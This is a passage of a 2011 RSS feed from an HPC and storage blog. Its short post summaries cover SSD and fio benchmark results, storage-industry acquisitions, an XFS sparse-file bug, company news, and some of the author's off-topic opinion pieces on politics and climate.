      <description>So we have our site at a nice small light industrial site. Good pricing, reasonable location. Been here 3+ years. The landlord is about to lose the property to either the bank, because they missed their mortgage payments, or the state, because they haven&amp;rsquo;t paid property taxes. Oh, and they haven&amp;rsquo;t paid water or trash collection bills. Found out about all of this last week when we were in NJ installing a cluster.</description>
    </item>
    
    <item>
      <title>anti-scaling (1/N) problems</title>
      <link>https://blog.scalability.org/2011/10/anti-scaling-1n-problems/</link>
      <pubDate>Wed, 26 Oct 2011 04:14:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/anti-scaling-1n-problems/</guid>
      <description>Imagine you have a fixed sized resource. Imagine you can completely consume that resource from 1 client. Now make this two clients, and completely consume the resource. Which is of fixed size. Each client will get 1/2 (on average) of the resource. Now make this four clients, and completely consume the resource. Which is of fixed size. Each client will get 1/4 (on average) of the resource. Don&amp;rsquo;tcha just love that anti-scaling behavior?</description>
    </item>
    
    <item>
      <title>Design and driver issues exposed under very high loads</title>
      <link>https://blog.scalability.org/2011/10/design-and-driver-issues-exposed-under-very-high-loads/</link>
      <pubDate>Sat, 22 Oct 2011 14:47:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/design-and-driver-issues-exposed-under-very-high-loads/</guid>
      <description>Most folks, when they build Fibre Channel systems, aren&amp;rsquo;t assuming a very high IOP rate. No, really. Each channel of an FC8 connection is about 1GB/s, which with 4k operations (neglecting overheads and other things), would give you about 256k IOPs. To date, most of these units have been connected to spinning disks, which, individually might max out at 300 IOPs. So from their design perspective, you could put about 874 disks per connection, assuming a perfect configuration, to max out the data channel.</description>
    </item>
    
    <item>
      <title>Semi-OT:  analysis smackdown</title>
      <link>https://blog.scalability.org/2011/10/semi-ot-the-best-papers-and-something-of-an-analysis-smackdown/</link>
      <pubDate>Fri, 21 Oct 2011 22:45:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/semi-ot-the-best-papers-and-something-of-an-analysis-smackdown/</guid>
      <description>If you haven&amp;rsquo;t seen the meme running around /. and other places, it&amp;rsquo;s that the BEST paper(s) &amp;ldquo;confirm&amp;rdquo; (note the scare quotes) AGW. The only problem with this is that it&amp;rsquo;s not true. They confirm that GW (climate change) is real (and I am not sure anyone disputes that). It&amp;rsquo;s the &amp;ldquo;A&amp;rdquo; part that is the issue. It&amp;rsquo;s been happening for billions of years. Takes some special sort of (not to mention massive amounts of) hubris to elevate a recent planetary occupant to a special status.</description>
    </item>
    
    <item>
      <title>In the run-up to SC11, yeah ... I&#39;m busy ...</title>
      <link>https://blog.scalability.org/2011/10/in-the-run-up-to-sc11-yeah-im-busy/</link>
      <pubDate>Fri, 21 Oct 2011 03:21:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/in-the-run-up-to-sc11-yeah-im-busy/</guid>
      <description>Wow &amp;hellip; After getting back from the UK and Sweden, a whole slew of orders came in from several existing and new customers. And booth prep (remember, we are in 4101, stop by and say hello!). And logistics &amp;hellip; and support &amp;hellip; and box tuning (in house, at customer sites, &amp;hellip;) and quoting, and performance monitoring/analysis for several customers (including one where strace seems to have missed child IO processes &amp;hellip;).</description>
    </item>
    
    <item>
      <title>One would think I know this by now ...</title>
      <link>https://blog.scalability.org/2011/10/one-would-think-i-know-this-by-now/</link>
      <pubDate>Wed, 12 Oct 2011 23:23:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/one-would-think-i-know-this-by-now/</guid>
      <description>&amp;hellip; when you prepare a unit for benchmarking &amp;hellip; mebbe &amp;hellip; mebbe &amp;hellip; it&amp;rsquo;s not such a good idea to configure it in &amp;hellip; I dunno &amp;hellip; super-conservative mode which &amp;hellip; er &amp;hellip; effectively nukes most of the performance? Mebbe? Maybe normal default config mode &amp;hellip; which is pretty much what we should have done &amp;hellip; is what&amp;rsquo;s needed? FWIW: for the unit we are bringing to #SC11, 2 initiators over 10GbE iSCSI were running this baby to 850+k IOPs, 4k block random read write (30% mix on write, mostly read) sustained for an hour for well over 100GB of data (far far larger than internal caches).</description>
    </item>
    
    <item>
      <title>A plea for sanity in benchmarking SSDs (and storage)</title>
      <link>https://blog.scalability.org/2011/10/a-plea-for-sanity-in-benchmarking-ssds-and-storage/</link>
      <pubDate>Thu, 06 Oct 2011 00:58:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/a-plea-for-sanity-in-benchmarking-ssds-and-storage/</guid>
      <description>This is really starting to worry me. I see site after site running similar sets of programs against SSDs, generating the same numbers, within error bars. The problem is that the numbers they generate are meaningless due to several measurement flaws. First: Sandforce controllers compress data. Which means that some data (say simple repeating patterns of, oh, I dunno, zeros?) will compress really well, and show bandwidths far higher than real use cases will measure.</description>
    </item>
    
    <item>
      <title>RIP Steve, and thanks for all the fish</title>
      <link>https://blog.scalability.org/2011/10/rip-steve-and-thanks-for-all-the-fish/</link>
      <pubDate>Thu, 06 Oct 2011 00:29:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/rip-steve-and-thanks-for-all-the-fish/</guid>
      <description>Steve Jobs, a young man of 56, passed away this evening. While not so much in traditional HPC, Apple profoundly changed the way we work with &amp;hellip; no &amp;hellip; the way we use, and think about using, computing technology. He is credited with the vision, though Apple has had and does have many very smart people working there. My condolences to his immediate family, and his extended family. Today, we bought our first MacBook Air.</description>
    </item>
    
    <item>
      <title>Dead on: Redhat grabs Gluster</title>
      <link>https://blog.scalability.org/2011/10/dead-on-redhat-grabs-gluster/</link>
      <pubDate>Tue, 04 Oct 2011 12:46:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/dead-on-redhat-grabs-gluster/</guid>
      <description>Readers of this blog will know I&amp;rsquo;ve been saying this publicly for a while (and no, I had no inside knowledge of this, no knowledge of it whatsoever, no one spoke to me, and I own no shares of any of these companies). Redhat acquiring Gluster is a good thing. While AB, Hitesh, and the team have done a bang up job getting the product out, and doing interesting things with it, they needed additional capital resources to take it to the next level.</description>
    </item>
    
    <item>
      <title>HPCWire readers choice awards:  feel free to write in awesome companies/products!</title>
      <link>https://blog.scalability.org/2011/09/hpcwire-readers-choice-awards-feel-free-to-write-in-awesome-companiesproducts/</link>
      <pubDate>Sat, 24 Sep 2011 17:20:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/hpcwire-readers-choice-awards-feel-free-to-write-in-awesome-companiesproducts/</guid>
      <description>See their link. They seem to have nicely allowed for write-ins, which makes voting better :) We don&amp;rsquo;t do much in manufacturing, so there&amp;rsquo;s little point to this for us. In HPC for life sciences, Scalable Informatics JackRabbit is in use at a number of sites as a very high performance storage unit. We don&amp;rsquo;t do much in automotive either. We do lots in financial services; with our Scalable Informatics JackRabbit being the best in breed performance for spinning rust systems, and from my understanding, causing some of our friends with pure PCIe Flash or SSD to say WTH!</description>
    </item>
    
    <item>
      <title>knobs that work</title>
      <link>https://blog.scalability.org/2011/09/knobs-that-work/</link>
      <pubDate>Fri, 23 Sep 2011 02:56:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/knobs-that-work/</guid>
      <description>As mentioned earlier, we&amp;rsquo;ve had a consistent problem with a few customers who wish to ignore their bills. They&amp;rsquo;d like to pretend we have no interest in getting paid, so they don&amp;rsquo;t pay. This is part of the reason why we&amp;rsquo;ve stopped acting like a bank. We aren&amp;rsquo;t very good at it, and it&amp;rsquo;s not our core competency. You want credit, go to a bank. You want the fastest (in terms of measured speed, not theoretical guesses) storage you can get, we can help.</description>
    </item>
    
    <item>
      <title>HP&#39;s board asks a deep fundamental question, possibly 10 months too late</title>
      <link>https://blog.scalability.org/2011/09/hps-board-asks-a-deep-fundamental-question-possibly-10-months-too-late/</link>
      <pubDate>Wed, 21 Sep 2011 21:39:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/hps-board-asks-a-deep-fundamental-question-possibly-10-months-too-late/</guid>
      <description>&amp;ldquo;Is this the right person for the job&amp;rdquo;? I pointed out that the direction itself was probably not that well thought out, and the concept &amp;hellip; dropping 1/3 of your revenue base, when you are atop the market in terms of installed base and run rate, probably wasn&amp;rsquo;t an idea that really should have been given serious credence. HP&amp;rsquo;s board is now, belatedly, asking &amp;hellip; do we have the right person for the job?</description>
    </item>
    
    <item>
      <title>On the test track with some new relampago device ...</title>
      <link>https://blog.scalability.org/2011/09/on-the-test-track-with-some-new-relampago-device/</link>
      <pubDate>Wed, 21 Sep 2011 20:17:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/on-the-test-track-with-some-new-relampago-device/</guid>
      <description>and we hit the throttle &amp;hellip; crack it open &amp;hellip; let&amp;rsquo;s see what this baby can do. Looking at a sustained &amp;hellip; well &amp;hellip; I dunno &amp;hellip; 1.2 million IOPS? Occasional bursts to 2.4M IOPS? At very nearly 10 GB/s? What does fio say?
 read : io=524416MB, bw=9339.6MB/s, iops=1195.5K, runt= 56150msec  and
Run status group 0 (all jobs): READ: io=524416MB, aggrb=9339.6MB/s, minb=9563.8MB/s, maxb=9563.8MB/s, mint=56150msec, maxt=56150msec  Nice! You may see something like this at SC11.</description>
    </item>
    
    <item>
      <title>Semi OT: Solar Ypsi</title>
      <link>https://blog.scalability.org/2011/09/semi-ot-solar-ypsi/</link>
      <pubDate>Wed, 21 Sep 2011 02:27:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/semi-ot-solar-ypsi/</guid>
      <description>Sometimes you know what your friends and acquaintances are up to &amp;hellip; and sometimes you see them in adverts for Google search &amp;hellip; Here&amp;rsquo;s the advert:
It&amp;rsquo;s semi-OT as the person, Dave Strenski, is also a long-time HPC hand at Cray, and has been a colleague of mine during our SGI/Cray days. He was one of the reasons I thought Cray had simply some of the best technical people anywhere.</description>
    </item>
    
    <item>
      <title>Some boot options considered harmful to performance</title>
      <link>https://blog.scalability.org/2011/09/some-boot-options-considered-harmful-to-performance/</link>
      <pubDate>Fri, 16 Sep 2011 23:26:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/some-boot-options-considered-harmful-to-performance/</guid>
      <description>(BTW: still in London, then off to Stockholm, then home) A customer just saw this with RHEL 6. Windows performance was higher than Linux performance on the same machine. The customer didn&amp;rsquo;t understand it, we made a first guess at it, and in the end our initial guess was wrong. But we caught what was wrong, with a WAG, and it troubled me. So I wrote this. First clue as to the nature of the problem came from numastat.</description>
    </item>
    
    <item>
      <title>Coming soon to a JackRabbit and DeltaV near you ...</title>
      <link>https://blog.scalability.org/2011/09/coming-soon-to-a-jackrabbit-and-deltav-near-you/</link>
      <pubDate>Thu, 08 Sep 2011 20:27:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/coming-soon-to-a-jackrabbit-and-deltav-near-you/</guid>
      <description>&amp;hellip; 4TB drives. Imagine, a nice 192TB in a single unit, coupled to a 5GB/s data movement engine. Coming soon &amp;hellip; :)</description>
    </item>
    
    <item>
      <title>Hitachi Data Systems acquires Bluearc</title>
      <link>https://blog.scalability.org/2011/09/hitachi-data-systems-acquires-bluearc/</link>
      <pubDate>Thu, 08 Sep 2011 14:58:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/hitachi-data-systems-acquires-bluearc/</guid>
      <description>[disclosure note: this is our space, so we have definite opinions on this] This was liable to be the only possible path for Bluearc to continue outside of an IPO. The latter would probably not have gone well. They raised their last round of capital a year ago. Reading what I wrote then, it was fairly prescient. Since that was written, EMC acquired Isilon, Netapp acquired LSI&amp;rsquo;s Enginio and other products, Dell grabbed Compellent (different market), HP grabbed 3Par.</description>
    </item>
    
    <item>
      <title>Seeing the light ... lots of app migration to accelerators (GPUs in particular)</title>
      <link>https://blog.scalability.org/2011/09/seeing-the-light-lots-of-app-migration-to-accelerators-gpus-in-particular/</link>
      <pubDate>Tue, 06 Sep 2011 18:59:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/seeing-the-light-lots-of-app-migration-to-accelerators-gpus-in-particular/</guid>
      <description>Last week, Gaussian Inc. started publicly talking about its GPU port of its Gaussian code. This is as conservative a development company as you will find. I know many other companies with ports (I won&amp;rsquo;t violate NDAs, which I&amp;rsquo;ve signed with a number of folks who post/comment here, and who read these &amp;hellip; feel free to post a note/link to your accelerated app). We&amp;rsquo;ve seen the early adopters come and stay.</description>
    </item>
    
    <item>
      <title>The business of business</title>
      <link>https://blog.scalability.org/2011/09/the-business-of-business/</link>
      <pubDate>Tue, 06 Sep 2011 16:13:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/the-business-of-business/</guid>
      <description>Just got an email from a vendor of workplace notices that reads
I won&amp;rsquo;t use the exact verbiage I think is appropriate for this.
So we&amp;rsquo;ve got an economy that&amp;rsquo;s struggling (well, we can euphemistically call it struggling), we have small businesses looking with great unease at future cost obligations due to new rules and regulations (one of which has been ruled unconstitutional, but the administration is pushing ahead on it anyway) &amp;hellip; and the current administration is seeking to make sure that my company&amp;rsquo;s employees know that they can organize, that I have to tell them this, and that it&amp;rsquo;s unfair if I don&amp;rsquo;t.</description>
    </item>
    
    <item>
      <title>Science by ad hominem? The continuing saga of a debate that is not scientific, but personal</title>
      <link>https://blog.scalability.org/2011/09/science-by-ad-hominem-the-continuing-saga-of-a-debate-that-is-not-scientific-but-personal/</link>
      <pubDate>Tue, 06 Sep 2011 00:56:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/science-by-ad-hominem-the-continuing-saga-of-a-debate-that-is-not-scientific-but-personal/</guid>
      <description>This is sad. I am not sure precisely who is beclowning themselves, but we see something that amounts to an ad hominem attack on a pair of researchers, who had the temerity to publish something that disagreed with the orthodoxy. Along the way, they are described as &amp;ldquo;uncareful&amp;rdquo; and &amp;ldquo;serial error&amp;rdquo; creators. Their paper has been ripped to shreds in blogs, and by a particular aspect of the media, as well as by various members of the orthodoxy.</description>
    </item>
    
    <item>
      <title>badly underwhelmed by 120GB Intel 510 performance</title>
      <link>https://blog.scalability.org/2011/09/badly-underwhelmed-by-120gb-intel-510-performance/</link>
      <pubDate>Sun, 04 Sep 2011 15:30:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/badly-underwhelmed-by-120gb-intel-510-performance/</guid>
      <description>The day job uses lots of SSDs as well as disks in various of our products. We rely upon internal testing and external benchmarks (which tend to be poor at best, but a very rough zeroth order test) to select them. We had a pair of Intel 510 SSD units in for a customer, and they performed &amp;hellip; just meh &amp;hellip; not all that exceptional. Better than our OS drives, but not as good as the higher end SSDs.</description>
    </item>
    
    <item>
      <title>Fixing pausing Nehalem/Westmere units</title>
      <link>https://blog.scalability.org/2011/09/fixing-pausing-nehalemwestmere-units/</link>
      <pubDate>Sun, 04 Sep 2011 06:01:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/fixing-pausing-nehalemwestmere-units/</guid>
      <description>Some Nehalem and Westmere units have &amp;hellip; er &amp;hellip; interesting unintended features &amp;hellip; yeah, that&amp;rsquo;s the politically correct way to say it. We like Intel and their products (and we&amp;rsquo;ve liked AMD in the past and their products). But we gotta call this one. As you watch dstat output, you see these occasional &amp;hellip; hangs &amp;hellip; for a few seconds. As if someone is monkeying with the clock. And that is, to a degree, what appears to be happening.</description>
    </item>
    
    <item>
      <title>Raw unapologetic firepower in a single machine ... a new record</title>
      <link>https://blog.scalability.org/2011/08/raw-unapologetic-firepower-in-a-single-machine-a-new-record/</link>
      <pubDate>Wed, 31 Aug 2011 02:45:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/raw-unapologetic-firepower-in-a-single-machine-a-new-record/</guid>
      <description>This is a 5U 108TB (0.1 PB) usable high performance tightly coupled storage unit we are shipping to a customer this week. This is a spinning rust machine. We&amp;rsquo;ve been busy little beavers. Tuning, tweaking. And tuning. And tweaking. Did I mention the tuning and tweaking?
Run status group 0 (all jobs): WRITE: io=196236MB, aggrb=4155.7MB/s, minb=4255.4MB/s, maxb=4255.4MB/s, mint=47222msec, maxt=47222msec  Oh. My. But &amp;hellip; it gets &amp;hellip; better.
Run status group 0 (all jobs): READ: io=196236MB, aggrb=5128.</description>
    </item>
    
    <item>
      <title>knobs</title>
      <link>https://blog.scalability.org/2011/08/knobs/</link>
      <pubDate>Tue, 30 Aug 2011 13:04:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/knobs/</guid>
      <description>A knob is something you can turn, in theory, to effect a change in output condition. In my business, I have a few knobs I can turn for customers to help them. We can be quite creative in this. We are often asked to help in cases where other companies would just start blinking rapidly. I like doing this. I really do enjoy working with customers and helping them solve their hard problems.</description>
    </item>
    
    <item>
      <title>Day job will have a booth at SC11 ... Woot!</title>
      <link>https://blog.scalability.org/2011/08/day-job-will-have-a-booth-at-sc11-woot/</link>
      <pubDate>Fri, 26 Aug 2011 04:21:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/day-job-will-have-a-booth-at-sc11-woot/</guid>
      <description>What&amp;rsquo;s different about this one? It&amp;rsquo;s ours, not space in someone else&amp;rsquo;s. Gives us more freedom, but also greater responsibility. One of the harder things to do is to figure out what to bring and show, and what to leave in the lab. Shipping stuff to the floor is expensive, time consuming, and a royal pain in the rear. Leaving it in the lab, and leveraging the network (not the wireless &amp;hellip; oh god that was horrible last year) is probably a better option.</description>
    </item>
    
    <item>
      <title>Day job adds a director of sales</title>
      <link>https://blog.scalability.org/2011/08/day-job-adds-a-director-of-sales/</link>
      <pubDate>Fri, 26 Aug 2011 04:13:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/day-job-adds-a-director-of-sales/</guid>
      <description>Took us long enough, but fundamentally, you have to work on getting the right team together. Someone I&amp;rsquo;ve known and respected for quite some time became available. I&amp;rsquo;ve been saying for a while we need someone just like him. So I didn&amp;rsquo;t miss the opportunity. Looking forward to reaching more customers and partners with him on board. More later &amp;hellip;</description>
    </item>
    
    <item>
      <title>Another day job milestone: afterburners kicking in on the company!</title>
      <link>https://blog.scalability.org/2011/08/another-day-job-milestone/</link>
      <pubDate>Tue, 23 Aug 2011 18:57:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/another-day-job-milestone/</guid>
      <description>As of today, we have achieved our highest revenue ever in a year as a company. And the year is only 3/4 over. We&amp;rsquo;re not done. Not by a long shot. If we shut the doors, and went on a nice 3+ month long vacation until the end of the year &amp;hellip; we&amp;rsquo;d have a 20% growth rate over last year for revenue. As it is, the 4th quarter is usually our busiest time.</description>
    </item>
    
    <item>
      <title>Is this really a good idea?</title>
      <link>https://blog.scalability.org/2011/08/is-this-really-a-good-idea/</link>
      <pubDate>Mon, 22 Aug 2011 05:39:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/is-this-really-a-good-idea/</guid>
      <description>Looks like HP is looking at ditching its PCs. First off, they are definitely killing off WebOS and the whole Palm business. Ok &amp;hellip; WebOS looked interesting. Now having an Android, and an iPhone (about to be retired, which the Android is replacing), I find it hard to put down the iPhone and get excited about Android. I have a sense of &amp;hellip; a less polished integration. Some things don&amp;rsquo;t work very well in Android.</description>
    </item>
    
    <item>
      <title>&#39;Amusing&#39; benchmarketing ... without ever having run a benchmark!</title>
      <link>https://blog.scalability.org/2011/08/amusing-benchmarketing-without-ever-having-run-a-benchmark/</link>
      <pubDate>Fri, 19 Aug 2011 18:05:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/amusing-benchmarketing-without-ever-having-run-a-benchmark/</guid>
      <description>Imagine you have a product, and you really haven&amp;rsquo;t measured its performance, but you want to make performance claims. So you take an &amp;ldquo;easy&amp;rdquo; way around this. You simply add up all your bandwidth or IOP data. Yeah, that&amp;rsquo;s it, you add it up. No, I&amp;rsquo;m not kidding. You do this. Is this meaningful in the HPC world? Hell no. Do people do this? Hell yes. Is it wrong? Extremely. Should you call vendors out who do this?</description>
    </item>
    
    <item>
      <title>A &#39;cool&#39; xfs bug</title>
      <link>https://blog.scalability.org/2011/08/a-cool-xfs-bug/</link>
      <pubDate>Fri, 19 Aug 2011 14:27:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/a-cool-xfs-bug/</guid>
      <description>No, really, bugs can be cool &amp;hellip; Customer has a user with a proclivity towards writing large files. Sparse large files. Say a couple Petabytes or so. Single file. I kid you not. (filenames and paths changed)
[root@jr4-2 ~]# ls -alF /data/brick-sdd2/dht/scratch/xyzpdq
total 4652823496
d---------   2 1232 1000    86 Jun 27 20:31 ./
drwx------ 104 1232 1000 65536 Aug 17 23:53 ../
-rw-------   1 1232 1000    21 Jun 27 09:57 Default.</description>
    </item>
    
    <item>
      <title>... and Ubuntu 11.04 has an ever so slightly broken root on iSCSI ...</title>
      <link>https://blog.scalability.org/2011/08/and-ubuntu-11-04-has-an-every-so-slightly-broken-root-on-iscsi/</link>
      <pubDate>Mon, 15 Aug 2011 20:08:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/and-ubuntu-11-04-has-an-every-so-slightly-broken-root-on-iscsi/</guid>
      <description>Ugh. See here. Got bit by this. BTW: The new internals of Tiburon are getting even more wild. This thing is turning into a very powerful system for booting large numbers of machines with (nearly) identical configs, very quickly (hmmm &amp;hellip; can you say &amp;hellip; cluster? Cloud? VMs? &amp;hellip;. mwhahahaha!). Will be re-adapting our menu system for this, but the Web GUI portion for configuring this is definitely in the near future.</description>
    </item>
    
    <item>
      <title>Been working on a GUI ... starting to hook the bits together ...</title>
      <link>https://blog.scalability.org/2011/08/been-working-on-a-gui-starting-to-hook-the-bits-together/</link>
      <pubDate>Sun, 14 Aug 2011 21:41:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/been-working-on-a-gui-starting-to-hook-the-bits-together/</guid>
      <description>The day job is asked for monitoring and admin GUIs for our products. I&amp;rsquo;ll be the first to admit I am a CLI person these days (having started out a CLI person, then becoming a GUI person, now back to a CLI person). I understand the desire for this, and some of the rationale behind it. So we&amp;rsquo;ve been thinking how to provide this as simply and unobtrusively as possible. And leverage/use/reuse our CLI goodness.</description>
    </item>
    
    <item>
      <title>An interesting perspective on running and maintaining a business in California</title>
      <link>https://blog.scalability.org/2011/08/an-interesting-perspective-on-running-and-maintaining-a-business-in-california/</link>
      <pubDate>Sun, 14 Aug 2011 01:57:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/an-interesting-perspective-on-running-and-maintaining-a-business-in-california/</guid>
      <description>[update: reorganized to have link up top, and commentary below this] Have a read of this blog entry. Very interesting. As a small business person, I am acutely aware of all the myriad ways that rules, regulations, taxes and fees can rise unexpectedly upon you. When taxes aren&amp;rsquo;t sane or predictable, you can suddenly get a bill for a substantial fraction of a well-paid employee&amp;rsquo;s monthly or yearly salary. We had that experience last year with Michigan&amp;rsquo;s MBT which replaced the SBT.</description>
    </item>
    
    <item>
      <title>Interesting comment from an SSD vendor support person</title>
      <link>https://blog.scalability.org/2011/08/interesting-comment-from-an-ssd-vendor-support-person/</link>
      <pubDate>Fri, 12 Aug 2011 19:30:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/interesting-comment-from-an-ssd-vendor-support-person/</guid>
      <description>Color me unimpressed. You have a &amp;ldquo;disk&amp;rdquo; drive, you expect all the trappings of that &amp;ldquo;disk&amp;rdquo; drive to work. Like activity lights. So you plug this device into a backplane that lights its activity lights from the disk. And it doesn&amp;rsquo;t work. Speaking with the backplane folks, they get their signals from the disk. Speaking with the disk folks &amp;hellip; Me: The activity light appears to be solid on all the time.</description>
    </item>
    
    <item>
      <title>Very cool science: broad spectrum anti-viral</title>
      <link>https://blog.scalability.org/2011/08/very-cool-science-broad-spectrum-anti-viral/</link>
      <pubDate>Wed, 10 Aug 2011 23:08:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/very-cool-science-broad-spectrum-anti-viral/</guid>
      <description>I saw this initially on /., and it linked to PLoS. PLoS is a great system BTW, and I&amp;rsquo;d love to see Physics, Engineering, CS, and other things join in. arxiv.org serves a similar function (rapid publication) though it isn&amp;rsquo;t peer reviewed prior to publication, while PLoS is. Basically, this anti-viral appears to show excellent efficacy across multiple virus infections &amp;hellip; everything from Dengue Fever to Rhinovirus (common cold). It would be wonderful if this technique would be active against retroviruses (HIV, etc.</description>
    </item>
    
    <item>
      <title>then afterburners kicked in ...</title>
      <link>https://blog.scalability.org/2011/08/then-afterburners-kicked-in/</link>
      <pubDate>Wed, 10 Aug 2011 21:19:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/then-afterburners-kicked-in/</guid>
      <description>&amp;hellip; sumthin fierce &amp;hellip; This could be (the) fastest 4U box on the market for streaming, which doesn&amp;rsquo;t use RAM for storage.
Run status group 0 (all jobs): READ: io=761904MB, aggrb=7455.4MB/s, minb=7634.3MB/s, maxb=7634.3MB/s, mint=102196msec, maxt=102196msec  That streaming is more than 8x RAM size. No PCIe flash cards in the unit. None. Zero. Zilch. yeah BABY!!! Right now, running a random read of that data set. 8k random reads across the entire 700+ GB data.</description>
    </item>
    
    <item>
      <title>Setting expectations for SSDs versus Flash</title>
      <link>https://blog.scalability.org/2011/08/setting-expectations-for-ssds-versus-flash/</link>
      <pubDate>Wed, 10 Aug 2011 20:52:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/setting-expectations-for-ssds-versus-flash/</guid>
      <description>Nomenclature: SSD is a physical device that plugs into an electrical disk slot. Flash is a PCIe card. Both use the same underlying back end storage technology (flash chips of SLC, MLC, and related). I&amp;rsquo;ve had a while to do some testing with a large number of SSD units in a single device. I can give you a definite sense of what I&amp;rsquo;ve been observing. First: SSDs are, of course, fast for certain operations.</description>
    </item>
    
    <item>
      <title>&#34;Evolution&#34; for Microsoft HPC</title>
      <link>https://blog.scalability.org/2011/08/evolution-for-microsoft-hpc/</link>
      <pubDate>Wed, 10 Aug 2011 06:08:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/evolution-for-microsoft-hpc/</guid>
      <description>This is old news at this time, but Microsoft has moved its HPC group into their Cloud groups. I&amp;rsquo;ve talked in the past about critical business decisions that need to be addressed over time, as a business matures, and a product line is given time to sink or swim. At the end of the day, a business has to make hard decisions about what products to introduce, which to end-of-life, which to grow independently, which to fold into other initiatives.</description>
    </item>
    
    <item>
      <title>heh ... good one !</title>
      <link>https://blog.scalability.org/2011/08/heh-good-one/</link>
      <pubDate>Tue, 09 Aug 2011 03:32:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/heh-good-one/</guid>
      <description>&amp;ldquo;Scientists Trace Heat Wave To Massive Star At Center Of Solar System&amp;rdquo; See here</description>
    </item>
    
    <item>
      <title>Not surprised ...  IBM pulls plug on Blue Waters</title>
      <link>https://blog.scalability.org/2011/08/not-surprised-ibm-pulls-plug-on-blue-waters/</link>
      <pubDate>Tue, 09 Aug 2011 02:33:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/not-surprised-ibm-pulls-plug-on-blue-waters/</guid>
      <description>I say I am not surprised for their reasoning &amp;hellip; not that I had an inkling that they would do this beforehand. Basically they pulled the plug because the costs were growing far faster than they planned, and they couldn&amp;rsquo;t afford to deliver the machine at the requested price. Which makes perfect sense to a business that has to consider profit and loss, but maybe not so much sense to research groups that want things.</description>
    </item>
    
    <item>
      <title>Ever have one of them moments ...</title>
      <link>https://blog.scalability.org/2011/08/ever-have-one-of-them-moments/</link>
      <pubDate>Mon, 08 Aug 2011 04:43:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/ever-have-one-of-them-moments/</guid>
      <description>&amp;hellip; where you look at a technology and think to yourself &amp;hellip; I need this. Just had that looking over MongoDB. I&amp;rsquo;ve spent the better part of a couple of weeks working on implementing a very poor mans version of this atop SQLite for one of our tools. And along comes MongoDB, and they solve the exact problem I am looking for. So, we are going to start implementing it on our units.</description>
    </item>
    
    <item>
      <title>Rethinking RAID for SSDs</title>
      <link>https://blog.scalability.org/2011/08/rethinking-raid-for-ssds/</link>
      <pubDate>Mon, 08 Aug 2011 04:15:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/rethinking-raid-for-ssds/</guid>
      <description>SSD units are fast, well, depending upon design, controller and other things. SandForce units use a compression and overprovision technology to reduce write amplification. SSD units do writes, optimally, in erase block sizes. This suggests that your RAID chunk size should be a multiple of the erase block size. This is a good thing. The issue is that if you have a hardware RAID controller, you might think that the optimal way to handle this is to build a RAID5 or RAID6 atop this SSD pool.</description>
    </item>
    
    <item>
      <title>OT: and on a happy personal note ...</title>
      <link>https://blog.scalability.org/2011/08/ot-and-on-a-happy-personal-note/</link>
      <pubDate>Mon, 08 Aug 2011 03:42:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/ot-and-on-a-happy-personal-note/</guid>
      <description>&amp;hellip; both my daughter and I were promoted to yon-kyu (green belt) in Isshinryu. Took me longer than I liked, but the specific kata we were learning was complex. Ok, it looks simple, but &amp;hellip; it really &amp;hellip; really &amp;hellip; isn&amp;rsquo;t. There is great subtlety in it. Mastering this takes a while. The moves took me about a month. The rest took me much longer. Here is one of the style&amp;rsquo;s leaders (10th Dan) showing how to do this</description>
    </item>
    
    <item>
      <title>PCIe Flash:  Yeah, I think it&#39;s here to stay</title>
      <link>https://blog.scalability.org/2011/08/pcie-flash-yeah-i-think-its-here-to-stay/</link>
      <pubDate>Mon, 08 Aug 2011 02:43:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/pcie-flash-yeah-i-think-its-here-to-stay/</guid>
